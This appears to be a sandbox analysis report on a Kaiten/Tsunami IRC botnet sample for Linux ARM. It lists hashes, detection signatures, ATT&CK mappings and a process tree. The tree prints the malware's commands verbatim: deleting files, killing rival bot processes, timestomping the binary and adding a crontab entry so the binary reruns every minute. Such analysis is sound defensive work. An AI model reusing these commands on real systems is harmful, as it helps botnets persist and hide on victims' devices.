kaiten | 4322bae804c3f54909eb1e40a7ae9761c1ec463c5e4cee3c8a9bc8bb99046a47

Analysis

max time kernel
149s
max time network
148s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
29-07-2024 07:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3ca9a2b5bc58b34deab4225800c3c40c_JaffaCakes118
Size

37KB
MD5

3ca9a2b5bc58b34deab4225800c3c40c
SHA1

85e43d03e910d82cc37bdb515f01cc9f84590620
SHA256

4322bae804c3f54909eb1e40a7ae9761c1ec463c5e4cee3c8a9bc8bb99046a47
SHA512

3cd4a2d720e0dcf52eab3a99fa17ab3dee79d54a6fdd09191745f918e4ea6010b759fd0e6adb3816c9b0ce9f597ad362483badccf075fd8b2197af9087990f78
SSDEEP

768:ipVE+UDsfbPCc3e6y5817dYhnFovuJTlsTZK2zhmBbo3U4:ipPZTdb68FdYFoWFlsVK2zhM2

Score

10^/10

kaiten botnet persistence

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

resource	yara_rule
behavioral1/memory/642-1-0x00008000-0x00028e84-memory.dmp	family_kaiten2

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.GW7gFt	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/19/stat	killall
File opened for reading	/proc/25/stat	killall
File opened for reading	/proc/29/stat	killall
File opened for reading	/proc/75/stat	killall
File opened for reading	/proc/19/stat	killall
File opened for reading	/proc/14/stat	killall
File opened for reading	/proc/28/stat	killall
File opened for reading	/proc/23/stat	killall
File opened for reading	/proc/14/stat	killall
File opened for reading	/proc/107/stat	killall
File opened for reading	/proc/218/stat	killall
File opened for reading	/proc/631/stat	killall
File opened for reading	/proc/578/stat	killall
File opened for reading	/proc/266/stat	killall
File opened for reading	/proc/13/stat	killall
File opened for reading	/proc/filesystems	killall
File opened for reading	/proc/134/cmdline	killall
File opened for reading	/proc/265/stat	killall
File opened for reading	/proc/1/stat	killall
File opened for reading	/proc/12/stat	killall
File opened for reading	/proc/27/stat	killall
File opened for reading	/proc/15/stat	killall
File opened for reading	/proc/29/stat	killall
File opened for reading	/proc/637/stat	killall
File opened for reading	/proc/19/stat	killall
File opened for reading	/proc/637/cmdline	killall
File opened for reading	/proc/271/stat	killall
File opened for reading	/proc/218/stat	killall
File opened for reading	/proc/579/stat	killall
File opened for reading	/proc/25/stat	killall
File opened for reading	/proc/288/stat	killall
File opened for reading	/proc/9/stat	killall
File opened for reading	/proc/163/stat	killall
File opened for reading	/proc/108/cmdline	killall
File opened for reading	/proc/684/stat	killall
File opened for reading	/proc/16/stat	killall
File opened for reading	/proc/107/stat	killall
File opened for reading	/proc/22/stat	killall
File opened for reading	/proc/17/stat	killall
File opened for reading	/proc/163/stat	killall
File opened for reading	/proc/147/stat	killall
File opened for reading	/proc/271/stat	killall
File opened for reading	/proc/640/stat	killall
File opened for reading	/proc/105/stat	killall
File opened for reading	/proc/682/stat	killall
File opened for reading	/proc/268/stat	killall
File opened for reading	/proc/681/stat	killall
File opened for reading	/proc/41/stat	killall
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/266/stat	killall
File opened for reading	/proc/108/stat	killall
File opened for reading	/proc/24/stat	killall
File opened for reading	/proc/268/stat	killall
File opened for reading	/proc/28/stat	killall
File opened for reading	/proc/1/stat	killall
File opened for reading	/proc/640/stat	killall
File opened for reading	/proc/265/stat	killall
File opened for reading	/proc/578/stat	killall
File opened for reading	/proc/639/stat	killall
File opened for reading	/proc/683/stat	killall
File opened for reading	/proc/134/cmdline	killall
File opened for reading	/proc/147/stat	killall
File opened for reading	/proc/13/stat	killall
File opened for reading	/proc/579/stat	killall

/tmp/3ca9a2b5bc58b34deab4225800c3c40c_JaffaCakes118
/tmp/3ca9a2b5bc58b34deab4225800c3c40c_JaffaCakes118
1⤵
PID:642
- /bin/sh
  sh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &"
  2⤵
  PID:643
- /bin/sh
  sh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &"
  2⤵
  PID:645
- /bin/sh
  sh -c "rm -rf /var/run/tty0 > /dev/null 2>&1 &"
  2⤵
  PID:647
- /bin/sh
  sh -c "rm -rf /var/run/tty1 > /dev/null 2>&1 &"
  2⤵
  PID:650
- /bin/sh
  sh -c "rm -rf /var/run/tty2 > /dev/null 2>&1 &"
  2⤵
  PID:654
- /bin/sh
  sh -c "rm -rf /var/run/tty3 > /dev/null 2>&1 &"
  2⤵
  PID:656
- /bin/sh
  sh -c "rm -rf /var/run/tty5 > /dev/null 2>&1 &"
  2⤵
  PID:658
- /bin/sh
  sh -c "rm -rf /var/run/tty6 > /dev/null 2>&1 &"
  2⤵
  PID:660
- /bin/sh
  sh -c "rm -rf /tmp/tty0 > /dev/null 2>&1 &"
  2⤵
  PID:662
- /bin/sh
  sh -c "rm -rf /tmp/tty1 > /dev/null 2>&1 &"
  2⤵
  PID:664
- /bin/sh
  sh -c "rm -rf /tmp/tty2 > /dev/null 2>&1 &"
  2⤵
  PID:666
- /bin/sh
  sh -c "rm -rf /tmp/tty3 > /dev/null 2>&1 &"
  2⤵
  PID:668
- /bin/sh
  sh -c "rm -rf /tmp/tty5 > /dev/null 2>&1 &"
  2⤵
  PID:670
- /bin/sh
  sh -c "rm -rf /tmp/tty6 > /dev/null 2>&1 &"
  2⤵
  PID:672
- /bin/sh
  sh -c "rm -rf /var/run/pty > /dev/null 2>&1 &"
  2⤵
  PID:674
- /bin/sh
  sh -c "killall -9 arm > /dev/null 2>&1 &"
  2⤵
  PID:676
- /bin/sh
  sh -c "killall -9 mips > /dev/null 2>&1 &"
  2⤵
  PID:678
- /bin/sh
  sh -c "killall -9 mipsel > /dev/null 2>&1 &"
  2⤵
  PID:680
- /bin/sh
  sh -c "killall -9 powerpc > /dev/null 2>&1 &"
  2⤵
  PID:682
- /bin/sh
  sh -c "killall -9 ppc > /dev/null 2>&1 &"
  2⤵
  PID:684
- /bin/sh
  sh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"
  2⤵
  PID:686
- /bin/sh
  sh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &"
  2⤵
  PID:688
- /bin/sh
  sh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &"
  2⤵
  PID:690
- /bin/sh
  sh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"
  2⤵
  PID:692
- /bin/sh
  sh -c "kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &"
  2⤵
  PID:694
- - /bin/cat
    cat "/tmp/.xs/*.pid"
    3⤵
    PID:697
- /bin/sh
  sh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"
  2⤵
  PID:696
- /bin/sh
  sh -c "chmod 700 /tmp/3ca9a2b5bc58b34deab4225800c3c40c_JaffaCakes118 > /dev/null 2>&1 &"
  2⤵
  PID:699
- /bin/sh
  sh -c "touch -acmr /bin/ls /tmp/3ca9a2b5bc58b34deab4225800c3c40c_JaffaCakes118"
  2⤵
  PID:701
- - /usr/bin/touch
    touch -acmr /bin/ls /tmp/3ca9a2b5bc58b34deab4225800c3c40c_JaffaCakes118
    3⤵
    PID:702
- /bin/sh
  sh -c "(crontab -l | grep -v \"/tmp/3ca9a2b5bc58b34deab4225800c3c40c_JaffaCakes118\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"
  2⤵
  PID:703
- - /bin/grep
    grep -v "no cron"
    3⤵
    PID:707
- - /bin/grep
    grep -v /tmp/3ca9a2b5bc58b34deab4225800c3c40c_JaffaCakes118
    3⤵
    PID:706
- - /usr/bin/crontab
    crontab -l
    3⤵
    PID:705
- - /bin/grep
    grep -v lesshts/run.sh
    3⤵
    PID:708
- /bin/sh
  sh -c "echo \"* * * * * /tmp/3ca9a2b5bc58b34deab4225800c3c40c_JaffaCakes118 > /dev/null 2>&1 &\" >> /var/run/.x001804289383"
  2⤵
  PID:709
- /bin/sh
  sh -c "crontab /var/run/.x001804289383"
  2⤵
  PID:710
- - /usr/bin/crontab
    crontab /var/run/.x001804289383
    3⤵
    - Creates/modifies Cron job
    PID:711
- /bin/sh
  sh -c "rm -rf /var/run/.x001804289383"
  2⤵
  PID:712
- - /bin/rm
    rm -rf /var/run/.x001804289383
    3⤵
    PID:713
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:714
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:715
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:716
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:717

/bin/rm
rm -rf /var/run/wgsh
1⤵
PID:644

/bin/rm
rm -rf /var/run/bbsh
1⤵
PID:646

/bin/rm
rm -rf /var/run/tty0
1⤵
PID:649

/bin/rm
rm -rf /var/run/tty1
1⤵
PID:653

/bin/rm
rm -rf /var/run/tty2
1⤵
PID:655

/bin/rm
rm -rf /var/run/tty3
1⤵
PID:657

/bin/rm
rm -rf /var/run/tty5
1⤵
PID:659

/bin/rm
rm -rf /var/run/tty6
1⤵
PID:661

/bin/rm
rm -rf /tmp/tty0
1⤵
PID:663

/bin/rm
rm -rf /tmp/tty1
1⤵
PID:665

/bin/rm
rm -rf /tmp/tty2
1⤵
PID:667

/bin/rm
rm -rf /tmp/tty3
1⤵
PID:669

/bin/rm
rm -rf /tmp/tty5
1⤵
PID:671

/bin/rm
rm -rf /tmp/tty6
1⤵
PID:673

/bin/rm
rm -rf /var/run/pty
1⤵
PID:675

/usr/bin/killall
killall -9 arm
1⤵
- Reads runtime system information
PID:677

/usr/bin/killall
killall -9 mips
1⤵
- Reads runtime system information
PID:679

/usr/bin/killall
killall -9 mipsel
1⤵
- Reads runtime system information
PID:681

/usr/bin/killall
killall -9 powerpc
1⤵
- Reads runtime system information
PID:683

/usr/bin/killall
killall -9 ppc
1⤵
- Reads runtime system information
PID:685

/usr/bin/killall
killall -9 daemon.armv4l.mod
1⤵
- Reads runtime system information
PID:687

/usr/bin/killall
killall -9 daemon.i686.mod
1⤵
- Reads runtime system information
PID:689

/usr/bin/killall
killall -9 daemon.mips.mod
1⤵
- Reads runtime system information
PID:691

/usr/bin/killall
killall -9 daemon.mipsel.mod
1⤵
- Reads runtime system information
PID:693

/bin/rm
rm -rf "/tmp/.xs/*"
1⤵
PID:698

/bin/chmod
chmod 700 /tmp/3ca9a2b5bc58b34deab4225800c3c40c_JaffaCakes118
1⤵
PID:700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/run/.x001804289383

Filesize
81B

MD5
7f35a7bd65b1d086b8a3edb2b3de150a

SHA1
b2e6bf830689eebdf3098693c79c25dc778e86a8

SHA256
3f3780afc13a4a5f6fae7fad9fd0ceb5d37fec9d88513cecc8091cd340df059a

SHA512
5e3f75c91266ee7ecf9c28f2af97821923b02cbe8e3b57e6b77e032136b629ee3d170c4d5298c54f16fc7b9c0151753c74270401f744f6708e05b1195d81f9af

Download Submit
/var/spool/cron/crontabs/tmp.GW7gFt

Filesize
278B

MD5
21dc31b772b0b4abbe6bb5a084d60133

SHA1
9ab424db5a693cc227b67124998a7eeee551f175

SHA256
51187e6ed3ede98f63089c6561ed426d0a43c860212520ebfc33d811b72c25ff

SHA512
635b97be3430557aed8208591b60508cbcd98ccb4a0344ef69824c6df9dae06c7319af2c4a0ae54b0eae9a456e23694667c57603c0dd3f6a3f08159f095c0f75

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads